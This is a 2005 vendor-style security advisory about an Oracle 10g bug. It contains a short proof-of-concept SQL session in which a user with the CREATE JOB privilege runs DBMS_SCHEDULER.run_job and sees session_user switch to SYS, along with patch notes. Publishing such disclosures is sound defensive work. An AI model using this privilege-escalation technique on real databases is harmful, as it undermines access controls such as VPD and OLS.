Name DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected Oracle 10g
Severity Medium Risk
Category Switch Oracle Username to user SYS
Vendor URL http://www.oracle.com/
Credit Oracle Metalink Forum 633336.995
Exploit http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=FOR&p_id=633336.995
Date 02 May 2005 (V 1.00)
Details
The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.
Example
Connect as a user with CREATE job privilege
SQL> select user from dual;
JOBUSER
SQL> execute dbms_scheduler.run_job('ANY_JOB');
PL/SQL procedure successfully completed.
SQL> select user from dual;
SYS
SQL> select (sys_context('userenv','session_user')) from dual;
SYS
SQL> select (sys_context('userenv','current_user')) from dual;
JOBUSER
SQL> show user
USER is "jobuser"
Patch Information
Oracle never released a security alert. It seems that this bug is fixed after applying the 10.0.1.4 patchset for Oracle.
Ā© 2005 by Red-Database-Security GmbH - last update 2-may-2005